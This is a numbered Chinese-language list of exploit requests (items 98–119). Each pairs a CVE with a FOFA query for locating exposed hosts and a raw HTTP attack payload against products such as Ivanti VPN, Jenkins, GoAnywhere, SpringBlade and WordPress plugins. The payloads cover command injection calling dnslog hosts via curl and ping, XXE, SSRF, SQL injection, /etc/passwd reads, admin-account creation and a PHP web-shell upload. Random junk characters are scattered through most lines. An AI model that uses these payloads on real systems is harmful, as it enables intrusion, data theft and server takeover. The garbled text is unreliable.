( w; N% j f1 x/ e# d6 M5 x% t6 A98. SpiderFlow爬虫平台远程命令执行6 Y# M5 x5 q O" Y! E, b3 Y6 X/ Q' ] }
CVE-2024-01959 C# d+ r. s/ k2 X- K6 w- O) N
FOFA:app="SpiderFlow"
0 Y& A+ |$ D9 z# m# NPOST /function/save HTTP/1.1
4 @! i3 A: ]% G3 O rHost: 192.168.40.130:8088
, G" b8 I) P0 G1 D0 l0 [User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
( c! z/ N! y3 z! V3 b0 RConnection: close# z8 s6 N% I9 D8 i% y2 R
Content-Length: 121
( g1 Q; z! ]; n" ~+ ~* q# AAccept: */*
9 W2 S# S/ _5 n1 v1 H, J FAccept-Encoding: gzip, deflate6 b1 Y$ P/ H6 A4 `: \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2; i& A1 E- h+ `. ]' I
Content-Type: application/x-www-form-urlencoded; charset=UTF-8, B1 ?, o7 d% R$ c7 E
X-Requested-With: XMLHttpRequest; A. i# P2 H; c* C! _! Y
: `3 D$ y7 x% i8 k- \9 @- Y0 w: Did=1&name=cmd¶meter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B4 S* F5 H1 b) n% B
. a' n; t* a6 T; k' ^
6 ~: n4 L0 D0 q6 g99. Ncast盈可视高清智能录播系统busiFacade RCE5 ]& |4 Q1 h4 o
CVE-2024-0305
6 x+ L8 Y* L5 UFOFA:app="Ncast-产品" && title=="高清智能录播系统" N& z3 U7 A& J5 t4 n! q
POST /classes/common/busiFacade.php HTTP/1.1( M2 W1 O; J( } [# u+ S
Host: 192.168.40.130:8080: f4 ^+ x, q& x8 s3 N) ^, b& B6 K0 K* b
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0& x' E' U! J* r0 e
Connection: close
/ o- l5 M# A6 C/ [! SContent-Length: 1546 R, h4 e! x" ]$ {& ^5 s0 }$ O
Accept: */** y, `- _0 e# n3 m, v
Accept-Encoding: gzip, deflate; n; ?3 W$ R X" @( t I, T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
5 d. a0 R2 j( S6 c; m+ n, C& D9 VContent-Type: application/x-www-form-urlencoded; charset=UTF-8+ |4 c8 @3 a$ @5 ?: U8 c* z
X-Requested-With: XMLHttpRequest2 `* p# K7 ]+ E8 F3 H( ?
3 D7 d1 R. D& |! y5 D
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D" b+ U9 g9 K4 b, e1 T
S' r( D2 x. I
" E5 n+ K4 u8 ]6 R# e
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传
6 x8 d! q B4 B) y- OCVE-2024-03528 J( D1 c2 l& i3 E
FOFA:icon_hash="874152924"
/ K" G' w3 m J. zPOST /api/file/formimage HTTP/1.1) D' W b) k0 {1 S1 }' K X+ A* `
Host: 192.168.40.130
" }- S! G( i2 [, W9 AUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
' O- P+ c! g$ G9 f4 f% s$ j. TConnection: close2 P0 S) m: f$ d
Content-Length: 201- F5 x( m5 h, F. E! }
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei& f! d+ o% V9 H
Accept-Encoding: gzip
' H5 P3 \& A2 }( P) I5 h% R" V
' V8 U6 _5 w& m5 v& D0 r------WebKitFormBoundarygcflwtei
6 r N7 [' @; E. dContent-Disposition: form-data; name="file";filename="IE4MGP.php"2 O k4 L, K4 c" A( G
Content-Type: application/x-php
$ P( z9 g7 z2 j. t/ y) r8 H1 X7 M- z+ B# A
2ayyhRXiAsKXL8olvF5s4qqyI2O
' P7 T& i& l K+ o# P# P8 `------WebKitFormBoundarygcflwtei--
. z1 W# N7 p# H( A
& w6 B. c) \" {( G, g6 I, U7 P3 ^$ l5 k/ F+ M" [, \6 }, a
101. ivanti policy secure-22.6命令注入& F+ W. H" c+ r- ~$ ~: O9 ~1 b
CVE-2024-21887/ L* i1 C, p o' x7 k; s. E2 c
FOFA:body="welcome.cgi?p=logo"
5 A7 c+ Z- B: b) G2 V+ [: iGET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1. k9 o) M+ L& t3 j+ r
Host: x.x.x.xx.x.x.x
2 o |4 a( Z( G3 [/ Y. zUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.361 `" l6 [9 I6 ?+ j" E" w2 J6 E6 _! y
Connection: close
. B9 Y- U u' ~. {Accept-Encoding: gzip
& y( @9 N: @) c4 M! J) p; @, A9 e" t6 L% D4 r. m
5 l9 R$ ^, c. u; d4 c102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行/ _5 m7 n4 a3 E5 Y' f' E% Z
CVE-2024-21893( W' O. a/ K; T, V3 q, Y
FOFA:body="welcome.cgi?p=logo"
. d W2 x5 P+ I9 vPOST /dana-ws/saml20.ws HTTP/1.1- ?# h! t: O+ ^' b1 d, o+ ^7 X; O8 c
Host: x.x.x.x3 o$ O g& c: g
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
% E1 ^! R$ ~/ J/ x( lConnection: close
/ s) p4 ^/ w7 l3 |+ O$ p, fContent-Length: 792
1 t3 d4 X U$ Q: m" \/ DAccept-Encoding: gzip. ~ C$ N) e4 z
# s+ n% w9 P+ e
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
. D: P& r7 n+ U: W* w$ d" B5 C% W3 v
! s7 M4 K# B2 x) Q" W103. Ivanti Pulse Connect Secure VPN XXE" w. V" W0 o7 g5 V8 z" g5 M2 y
CVE-2024-22024
, [/ r, m: z. b/ K% ]+ a$ Z HFOFA:body="welcome.cgi?p=logo"
3 H/ e) w, E& H' ?9 PPOST /dana-na/auth/saml-sso.cgi HTTP/1.1+ A2 F0 q) ^) Z) E9 N6 k6 H) s6 l
Host: 192.168.40.130:111
. g8 @5 p5 ~) x H- l$ ZUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36& E2 M+ i& ]& E* q
Connection: close
0 }. I& S% B3 v2 P2 y- pContent-Length: 204* K5 N, Q9 }' F
Content-Type: application/x-www-form-urlencoded8 a6 ~% }" N" I5 ]; Z
Accept-Encoding: gzip& Z, o; m3 d; O1 V o) e
' g9 V8 }5 V; R8 V+ t2 o1 YSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
$ D7 A% I( V2 | X
) U' c: A5 y) O0 G! |# Y; h+ c2 {7 w7 T6 }8 W
其中SAMLRequest的值是xml文件内容的base64值,xml文件如下
4 Z. {4 h+ P' w' I6 I/ N4 Q1 i<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
6 E( {: {* @* ^7 r+ i A
+ W$ R) p Y {, L, f% i# R( u) m* W4 J" Q% X
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露 [; o- ?/ ?3 R, d" s
CVE-2024-0569$ m: Y4 m' d# S; E) g
FOFA:title="TOTOLINK"
) P9 N8 K( K5 jPOST /cgi-bin/cstecgi.cgi HTTP/1.1
5 ~) c$ l( d$ }8 q% z5 b9 vHost:192.168.0.1+ E/ o; V$ n3 |
Content-Length:41: R! L" Y$ m, D, h- }- {( N
Accept:application/json,text/javascript,*/*;q=0.013 ^9 s9 s( S/ N
X-Requested-with: XMLHttpRequest, o7 U/ ^+ g' Y# S6 t; w& o
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
9 D' k+ H' F- a9 J, F% I$ rContent-Type: application/x-www-form-urlencoded:charset=UTF-8
3 U) g0 i0 C) ]3 O! ]Origin: http://192.168.0.1
: D$ U4 t1 Q$ Y2 \Referer: http://192.168.0.1/advance/index.html?time=1671152380564: u6 U8 e) y8 E" G& Y! n
Accept-Encoding:gzip,deflate
' v Q% y9 w) A8 H6 QAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
$ r+ }& G7 k6 b8 v% u4 ^' mConnection:close2 x4 C O2 S5 V
: r8 {7 n8 G6 D+ L9 H) l# z# m{
' z4 E6 B5 q$ p% r! j; B0 D"topicurl":"getSysStatusCfg",* r7 L* {: G, I8 b! e& C
"token":""
# z6 H: z: Q8 k9 L; B) n: i} i* K+ |7 h0 R3 f$ y
$ A- T, N) {( D! p" b
105. SpringBlade v3.2.0 export-user SQL 注入
; m, t! D6 B0 D/ C& O5 EFOFA:body="https://bladex.vip"; m K. ~6 h& F0 S3 [4 `
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1
9 v2 i* Z. @, \4 z
. m# d1 q0 d0 b! g4 M106. SpringBlade dict-biz/list SQL 注入
) d, ~* Y/ l$ g6 o+ h1 JFOFA:body="Saber 将不能正常工作"
, O3 H/ [5 [" _3 A# `: i2 N9 ]5 O( ~GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
, X2 p: M1 H6 } WHost: your-ip# \; @! P: [1 ~6 J7 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" ^9 H7 I3 c) u$ i9 x! O9 ?Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
9 ^- s( k' K: |: j6 I) DAccept-Encoding: gzip, deflate
& m, {2 @& n. L3 E4 lAccept-Language: zh-CN,zh;q=0.9- T$ T5 j! ?7 t4 r9 V
Connection: close
$ d; G6 D# x& X) L* F# l4 `! X, W7 {7 ~: ~: z
4 w, O4 n: Z/ [- b
107. SpringBlade tenant/list SQL 注入, R$ S3 u3 e) E. v' |
FOFA:body="https://bladex.vip"0 @0 s) I. `* T: [1 E* Q6 O/ y
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
8 ^+ ?4 M4 w: H$ y" {9 K) ^+ Y, oHost: your-ip- n' `( e7 ~1 f' u5 z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 h7 F( _6 I8 }1 M
Blade-Auth:替换为自己的+ J7 o. k. f; j) ]( n9 q1 c. r
Connection: close
8 i2 p% J5 \: V" ~6 i) y2 A8 t" O; o# E# s9 s
& }$ k' e5 f* X$ T108. D-Tale 3.9.0 SSRF
6 {8 J/ |& L1 ^$ \CVE-2024-21642
: [# A, Q+ Y4 Z6 o" I( _% I: NFOFA:"dtale/static/images/favicon.png"
# u$ G9 u5 G+ L. W+ AGET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1/ E) U A7 G4 `5 G# s/ x
Host: your-ip2 N: \5 O. i7 u* F3 X
Accept: application/json, text/plain, */*) O+ s! U# T' X6 I7 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36, y& i0 a! v% R* ~' s- b
Accept-Encoding: gzip, deflate
* B4 N5 P$ C- y8 l3 _Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
; p: l# F& V( T: B: A3 G9 hConnection: close
; |& o3 a; r2 b. o
+ d1 M! V/ [& K# f" n
1 ]! {( [3 H5 H) |/ L109. Jenkins CLI 任意文件读取
9 o Y" t3 l. s- a+ i+ B- |CVE-2024-23897; j3 r5 X( i1 B8 n' q
FOFA:header="X-Jenkins"
+ f. V8 y+ ^% S iPOST /cli?remoting=false HTTP/1.1& l+ L- R# _: `* m) R0 J+ U/ j
Host:
8 Q; O7 f2 T! i ^Content-type: application/octet-stream
5 x' f$ S- L( c5 M9 n d$ Q! `; H6 ~4 pSession: 39382176-ac9c-4a00-bbc6-4172b3cf1e922 K" a; o; p7 P+ _( h3 H! |9 y/ i
Side: upload. e) s4 ~/ O5 l$ `. u
Connection: keep-alive$ T+ i1 h( N) Q
Content-Length: 163& o9 t8 l V) w% \1 h0 |/ p
/ ^+ e: V" ?. ]
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03') S* P: R3 G: _0 \/ f- |2 Q! r# c) e
1 a' q4 Y) E$ _* g
5 T4 m6 {% F1 {
POST /cli?remoting=false HTTP/1.1( P. j+ @# n+ g; R$ Q, Y
Host:+ k* f- P* C& {- J8 ~# g$ H
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92# i8 A4 c M/ o6 r; E9 M
download6 w# }- u0 p! q9 i2 X
Content-Type: application/x-www-form-urlencoded
9 F2 O" n. L; x; |; G1 q* PContent-Length: 0
; G4 B9 S3 F5 }% M/ T5 S1 U8 r3 {3 a
4 o1 t: t7 i0 x" o4 r& p _
ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
5 \1 i. L0 |" y1 m0 ^java -jar jenkins-cli.jar help. F/ Q1 r# s8 e+ o
[COMMAND]
9 M; m2 @& {% W$ F& r: t& MLists all the available commands or a detailed description of single command.
- h% g( V+ W6 _! p COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash) r! H C: A2 w) S6 N. I
* h/ V- L5 h5 b$ _% C
/ O& q" M3 G* X% }110. Goanywhere MFT 未授权创建管理员
D- }2 ^5 Q0 _+ F: tCVE-2024-0204
6 k0 _5 G' }! \; G% {. gFOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
" ]7 i# A; }" u) \- t- H! UGET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1) B8 p) U0 p g1 l# q
Host: 192.168.40.130:8000- K! l5 N1 j3 e- I) x( v/ b# G
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
+ q6 Q0 L5 m) }# @- i$ @Connection: close7 t, y" O8 |: v2 N% A
Accept: */*( S( E4 Q% E0 e0 w" S+ J. r# S
Accept-Language: en2 y$ f2 e! N) m! |" O0 Y! C/ \: R
Accept-Encoding: gzip
( v9 v5 t, c( w! ?2 W- O0 d" G: m# ~' o
1 `: N( i7 N7 a& {1 \& [; G2 {
111. WordPress Plugin HTML5 Video Player SQL注入% s/ f, u9 E5 g. ^$ C5 t4 Q
CVE-2024-1061# l$ K; @, v6 t) S* M0 `- _4 g
FOFA:"wordpress" && body="html5-video-player"
- w( b ^% x' ~& _+ M1 uGET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.15 J6 C* b$ b* k9 X
Host: 192.168.40.130:1124 v. l: e, m0 I/ k, o
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
0 y% o' d$ E7 G+ \" @ W7 fConnection: close$ A J& `/ |, [# r( J# s
Accept: */*
0 \/ z; a0 G! ^* a9 O) rAccept-Language: en6 s3 s$ K6 d t2 T R5 z
Accept-Encoding: gzip: O/ j/ ~9 [+ f% K, O% B
5 h" N( [; c4 N' B/ |' M$ m! h* c4 a) n/ Y
112. WordPress Plugin NotificationX SQL 注入
6 i4 Z V* r1 aCVE-2024-1698
% {% S. @0 P' o4 d9 h- K8 B# |( `FOFA:body="/wp-content/plugins/notificationx"0 |8 \1 s; `1 Y4 U& B8 C, U
POST /wp-json/notificationx/v1/analytics HTTP/1.17 u& j- |4 Z/ q# p
Host: {{Hostname}}
. o: Z9 T. W$ P! d/ R. lContent-Type: application/json2 H$ l& a+ _/ r
) h( ?; O N$ J) V3 N* A. g
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}8 z ^/ T; j! P. h
9 @4 [8 ^) @( N' B
+ x+ x$ R- N1 [3 y" a113. WordPress Automatic 插件任意文件下载和SSRF6 _ o/ h! F. B2 Q7 n- I
CVE-2024-27954, a0 y5 S. l, ]( Y+ R
FOFA:"/wp-content/plugins/wp-automatic"- [' J, K1 v i: i6 { @
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1( b4 s3 m3 n" o: V) z$ w
Host: x.x.x.x
/ h' E9 L2 b, U, x% ?User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36& I3 a; M- _% z- A
Connection: close4 |- l" V9 e9 t& N) x
Accept: */*
, h6 x6 T) Y. d$ r/ OAccept-Language: en
, v+ S# k, I4 H( _! {) I9 jAccept-Encoding: gzip4 A- ~# ?$ k, Z8 f; `( x9 [
' Y, g) a# p2 k1 G* C- X
* }0 z2 O0 @2 F+ k$ |114. WordPress MasterStudy LMS插件 SQL注入% m7 u% E7 D+ Y; F3 v2 M/ k0 m
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"8 m( y% w$ @6 k' o* H/ N' s
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1: ]; c, s8 L1 I1 n2 [; Q
Host: your-ip( c; Z. y D4 h, l1 n$ {! u0 s
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.362 z& }. \1 R S- |7 h3 i
Accept-Charset: utf-8. z- \9 G/ _- w9 ?, m. n- z
Accept-Encoding: gzip, deflate
5 u: R' @' b8 R2 o& W% y2 AConnection: close
# ]* S8 J! G* X+ @' p) ^" n6 {7 V' f2 B% e9 T) j
) y9 e8 _4 F6 p+ \& P0 o M# Z115. WordPress Bricks Builder <= 1.9.6 RCE
: I4 A2 [7 W7 L- t: O4 t5 W% VCVE-2024-25600
% ?2 N0 O: [6 V$ J. O0 W7 W* N# bFOFA: body="/wp-content/themes/bricks/"
# }: R& V2 J6 m3 ?$ _! x" p- T第一步,获取网站的nonce值
8 R# D/ |5 C6 zGET / HTTP/1.1* _+ O, y, z$ D1 o! R
Host: x.x.x.x4 l8 X/ A# g2 ?
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
' @3 w2 B9 @8 M6 FConnection: close) L5 g" ?4 g% f) X- t: a: r8 ]
Accept-Encoding: gzip+ }2 ?8 L" y8 ^- B0 N2 P, i0 D
8 |! [5 {5 M: }( }' `& }# Q. z& S+ z$ N5 M- _5 z6 d! c; e
第二步替换nonce值,执行命令
. ]! I, O$ f) x, gPOST /wp-json/bricks/v1/render_element HTTP/1.11 [& {/ [4 ^3 a* M, y
Host: x.x.x.x
" N7 {( G0 c5 Y7 _' n7 pUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
7 o1 \8 P" O% ]3 n$ SConnection: close1 K/ z+ j8 H7 F8 d. B' x1 n0 l% K
Content-Length: 356* r1 R3 m: q/ Y) _* n' x9 r
Content-Type: application/json
7 ] n" \7 M' MAccept-Encoding: gzip
, N6 B8 V5 v3 G3 |4 `
. t/ k3 {" s6 F( t+ H{7 A' M% S# V9 J1 D% }
"postId": "1",4 o; f* E8 {8 k; p! I
"nonce": "第一步获得的值",
+ ]8 u5 X/ c6 h "element": {
" ~2 V2 w& _: [1 d# a7 _# y "name": "container",
6 v+ p5 C0 a4 a( j "settings": {2 u0 b# E$ p4 [
"hasLoop": "true",7 n1 E9 e+ K) N+ C/ ]( H1 c
"query": {# Z7 G6 o) Q W& `7 h3 w
"useQueryEditor": true,6 U; w$ N4 `2 g
"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",% d- o$ s( P. U2 z
"objectType": "post"
! ]+ d1 D4 [& h. l7 W }# T3 V. E9 g! ~& J2 k8 }
}+ b6 J" a. ]. i* w W: D1 f
}, O5 l% C: z* |; N N& L
}
- B: H0 O( F y5 |/ D
( K/ X$ ]& a0 X' z5 Z7 L! z+ Y+ R1 f% K! G- O
116. wordpress js-support-ticket文件上传1 V2 L5 O& A& I, l# n2 {5 ^ f
FOFA:body="wp-content/plugins/js-support-ticket"6 y% I/ q9 x2 K
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1+ S$ s [; [4 T, c3 V; u4 V8 A4 ^
Host:
- F0 n, e& w: l8 ?1 q6 NContent-Type: multipart/form-data; boundary=--------767099171& i( H) k- W N& e/ x4 K
User-Agent: Mozilla/5.04 e* E- C/ ^) O: W" d9 r0 p0 I/ _
( Y9 z K; j& L$ l9 E* d0 O----------767099171! `4 B! ^* z2 M
Content-Disposition: form-data; name="action"$ S5 @" w a% @
configuration_saveconfiguration6 i: I1 x7 @6 S" l; d+ {' X$ H
----------767099171$ j" j, c9 s r0 E# d
Content-Disposition: form-data; name="form_request"
! x f- ~6 { i4 }* K0 n/ n& U `jssupportticket
% L O/ s2 T; H3 i* I----------767099171# Q Q/ g, I5 { p- N/ P
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
4 t" v! K4 X1 j8 KContent-Type: image/png
?! s7 O y% e, a. x8 d+ l$ J----------767099171--
$ c* p3 y9 g6 R) p+ m+ c! U+ t* ]+ C' d5 X7 e2 ^
1 @$ Q4 w' [/ M) C: P117. WordPress LayerSlider插件SQL注入
a2 k4 f# I$ tversion:7.9.11 – 7.10.0
. A/ m$ A3 E7 ^FOFA:body="/wp-content/plugins/LayerSlider/": X0 N0 N. ]0 `& C( E! ]
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1 t# X0 D3 F/ ^; ^- K+ h6 S# b8 K @# Z; z
Host: your-ip
) N& F& n/ e6 r% t; p8 {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0. Z6 a( U* P/ V2 H
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ q! K* H7 R) @ M4 t) w' H
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: L- ] Z$ l. D, F& ^+ p
Accept-Encoding: gzip, deflate, br
3 I% T; u2 m+ W9 s* Z& \Connection: close
1 C3 P' s) }0 g5 ^$ z: zUpgrade-Insecure-Requests: 1
; r# D. E4 E- h+ b) ?5 ~4 {4 B1 Q: f- }4 {7 t9 O G
; {" X7 [$ [* U6 U- \
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
; E6 j) _, p6 c6 z4 p% `CVE-2024-0939* i9 G3 r& ~4 A+ x0 m N4 |
FOFA:title="Smart管理平台"
. S0 ?8 Z9 g# f5 z, DPOST /Tool/uploadfile.php? HTTP/1.16 w6 {) H& s4 {. T* o9 Z
Host: 192.168.40.130:8443. s! U& K0 T# Z, R) Q
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8& B5 L) j1 ~' n5 n4 }8 [0 \' j
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
# I* @# J# n# GAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
, n$ |% o: O: @* A: Z; j* jAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
, Z* I U: `; _' g6 hAccept-Encoding: gzip, deflate; j& e& K k/ ?
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887! x9 H+ n6 T" m( j |0 F" e
Content-Length: 405
0 O# L0 M: n; z, e3 O- L0 @Origin: https://192.168.40.130:8443% M$ b& l$ ]2 S J. B
Referer: https://192.168.40.130:8443/Tool/uploadfile.php, U7 p+ ~& Z# }+ {( F
Upgrade-Insecure-Requests: 1
1 z3 b6 G2 f; @4 Z5 ^) g& y" ]Sec-Fetch-Dest: document
! h3 X% e/ T% w$ \! USec-Fetch-Mode: navigate
$ S2 H% x7 k# U: m* Z" }% tSec-Fetch-Site: same-origin- I v; {7 r1 x1 k, ^
Sec-Fetch-User: ?18 w: B. u6 F/ o0 k' w9 ]9 G3 z
Te: trailers7 z. }8 p U' d
Connection: close/ W6 F. B, ?3 R; A ]8 m8 J' S
/ \, W$ E% b/ P/ t# w' ^( t/ _8 n
-----------------------------13979701222747646634037182887# U0 w3 B8 t. r! [
Content-Disposition: form-data; name="file_upload"; filename="contents.php"7 o$ g0 \. u% z3 _- H, b1 W" [* W8 s! l
Content-Type: application/octet-stream
( V4 d- t9 ]3 i7 m
7 i- L3 f, [+ g3 x: _4 ?<?php
- n: a$ }0 C* Msystem($_POST["passwd"]);
% C s6 P/ \' C( M7 H?>
; q( T, d5 o, H3 L3 J# f7 |-----------------------------13979701222747646634037182887 G, S2 @2 M! B3 a( g/ L
Content-Disposition: form-data; name="txt_path"
8 j" a7 {6 K! }0 A1 a5 e6 O3 C$ Y2 e" q5 }
/home/src.php
- O# X* v. r# U1 t# P8 q8 \! A8 |9 E-----------------------------13979701222747646634037182887--
+ K1 O5 t' y* U; O# X: r9 }
- B* p8 H5 M# E+ I ? i) V2 `! h x% g
访问/home/src.php. S3 I W; S* `0 B8 c4 h
" Y* E2 H Q( `+ N. ?119. 北京百绰智能S20后台sysmanageajax.php sql注入- X0 o2 n1 V. n4 k5 h. @2 @
CVE-2024-1254
( A$ K" ]7 v! H% a0 FFOFA:title="Smart管理平台"
( H6 |' U; W. b, |, p% x先登录进入系统,默认账号密码为admin/admin
/ b3 U' y8 z' D' f6 \7 i! R2 |POST /sysmanage/sysmanageajax.php HTTP/1.11
- D4 g6 H. F; h! n2 e2 ]7 CHost: x.x.x.x
+ E" U" g4 J VCookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
( \$ s) [9 N. ?1 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
% Z" h7 T0 z* E* U7 T. \Accept: */*4 k! _6 L) w" _7 [, W2 ^7 E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 x) R" b+ V7 B; F; ?8 s& N
Accept-Encoding: gzip, deflate
